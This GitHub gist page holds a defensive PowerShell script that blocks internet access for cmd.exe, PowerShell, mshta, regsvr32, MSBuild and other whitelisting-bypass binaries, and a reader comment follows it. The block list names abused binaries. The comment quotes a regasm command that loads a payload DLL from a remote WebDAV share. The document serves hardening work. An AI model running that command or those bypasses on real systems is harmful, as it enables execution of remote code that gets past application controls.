Skip to content

Instantly share code, notes, and snippets.

@dstreefkerk

dstreefkerk/Create-MitigationFirewallRules.ps1

Last active February 22, 2024 18:18
Show Gist options
  • Star 13 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save dstreefkerk/800a9e0a22a6242a28b058be423cf0ba to your computer and use it in GitHub Desktop.
Save dstreefkerk/800a9e0a22a6242a28b058be423cf0ba to your computer and use it in GitHub Desktop.
Download ZIP
A script to automatically generate Windows Firewall with Advanced Security outbound rules to prevent malware from being able to dial home.
Raw
Create-MitigationFirewallRules.ps1
#Requires -Version 5 -Module NetSecurity -RunAsAdministrator
<#
.SYNOPSIS
Create-MitigationFirewallRules - Creates Windows Firewall rules to mitigate certain app whitelisting bypasses and to prevent command interpreters from accessing the Internet
.DESCRIPTION
A script to automatically generate Windows Firewall with Advanced Security outbound rules
to prevent malware from being able to dial home.
These programs will only be allowed to communicate to IP addresses within the private IPv4 RFC1918 ranges:
https://en.wikipedia.org/wiki/Private_network#Private_IPv4_address_spaces
The method I used to blacklist everything other than RFC1918 addresses was copied from a blog post by https://twitter.com/limpidweb
https://limpidwebblog.blogspot.com.au/2016/10/a-shower-leads-to-powershell-puking.html
Application Whitelisting bypasses sourced from Casey Smith's list here:
https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt
This script could be modified to write these rules to an existing GPO using the -GPOSession parameter on New-NetFirewallRule
PowerShell 5.0 is required because I'm using Classes
.OUTPUTS
Nothing
.EXAMPLE
Create-MitigationFirewallRules
.LINK
https://gist.github.com/dstreefkerk/800a9e0a22a6242a28b058be423cf0ba
.NOTES
Written By: Daniel Streefkerk
Website: http://daniel.streefkerkonline.com
Twitter: http://twitter.com/dstreefkerk
Todo: Nothing at the moment
Change Log
v1.0, 24/10/2017 - Initial version
#>
$rules = @()
Class FirewallRule {
[string]$DisplayName
[string]$Program
[string]$Description
[string]$Action = 'Block'
[string]$LocalAddress = 'Any'
[string]$Direction = 'Outbound'
[string[]]$RemoteAddress = @('0.0.0.0-9.255.255.255','11.0.0.0-172.15.255.255','172.32.0.0-192.167.255.255','192.169.0.0-255.255.255.255')
}
# 32 and 64 bit versions of cmd.exe
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - cmd.exe';Program='%SystemRoot%\SysWOW64\cmd.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - cmd.exe (x64)';Program='%SystemRoot%\System32\cmd.exe'}
# conhost.exe - not sure if this is needed, but blocking anyway
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - conhost.exe (x64)';Program='%SystemRoot%\System32\conhost.exe'}
# 32 and 64 bit versions of cscript.exe
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - cscript.exe';Program='%SystemRoot%\SysWOW64\cscript.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - cscript.exe (x64)';Program='%SystemRoot%\System32\cscript.exe'}
# 32 and 64 bit versions of wscript.exe
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - wscript.exe';Program='%SystemRoot%\SysWOW64\wscript.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - wscript.exe (x64)';Program='%SystemRoot%\System32\wscript.exe'}
# 32 and 64 bit versions of mshta.exe
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - mshta.exe';Program='%SystemRoot%\SysWOW64\mshta.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - mshta.exe (x64)';Program='%SystemRoot%\System32\mshta.exe'}
# PowerShell ISE
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - powershell_ise.exe';Program='%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - powershell_ise.exe (x64)';Program='%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell_ise.exe'}
# PowerShell
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - powershell.exe';Program='%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - powershell.exe (x64)';Program='%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe'}
# 32 and 64 bit versions of regsvr32.exe - application whitelisting bypass
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - regsvr32.exe';Program='%SystemRoot%\SysWOW64\regsvr32.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - regsvr32.exe (x64)';Program='%SystemRoot%\System32\regsvr32.exe'}
# 32 and 64 bit versions of rundll32.exe - application whitelisting bypass
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - rundll32.exe';Program='%SystemRoot%\SysWOW64\rundll32.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - rundll32.exe (x64)';Program='%SystemRoot%\System32\rundll32.exe'}
# 32 and 64 bit versions of msdt.exe - application whitelisting bypass
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - msdt.exe';Program='%SystemRoot%\SysWOW64\msdt.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - msdt.exe (x64)';Program='%SystemRoot%\System32\msdt.exe'}
# .Net-based application whitelisting bypasses
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - dfsvc.exe - 2.0.50727';Program='%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - dfsvc.exe - 2.0.50727 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - dfsvc.exe - 4.0.30319';Program='%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - dfsvc.exe - 4.0.30319 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - ieexec.exe - 2.0.50727';Program='%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\IEExec.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - ieexec.exe - 2.0.50727 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 2.0.50727';Program='%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 2.0.50727 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 3.5';Program='%SystemRoot%\Microsoft.NET\Framework\v3.5\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 3.5 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v3.5\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 4.0.30319';Program='%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - MSBuild.exe - 4.0.30319 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - InstallUtil.exe - 2.0.50727';Program='%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - InstallUtil.exe - 2.0.50727 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - InstallUtil.exe - 4.0.30319';Program='%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'}
$rules += New-Object FirewallRule -Property @{DisplayName='Block Internet Access - InstallUtil.exe - 4.0.30319 (x64)';Program='%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe'}
# Add more of your own rules by copying and uncommenting the line below
# $rules += New-Object FirewallRule -Property @{DisplayName='';Program=''}
# Create all of the rules using New-NetFirewallRule
foreach ($rule in $rules) {
New-NetFirewallRule -DisplayName $rule.DisplayName -Direction $rule.Direction -Description $rule.Description -Action $rule.Action `
-LocalAddress $rule.LocalAddress -RemoteAddress $rule.RemoteAddress -Program $rule.Program
}
Copy link

ghost commented Jun 13, 2018

This is very nice! Thanks for this script. I would also add Regasm/Regsvc

Example:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \webdavserver\folder\payload.dll

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment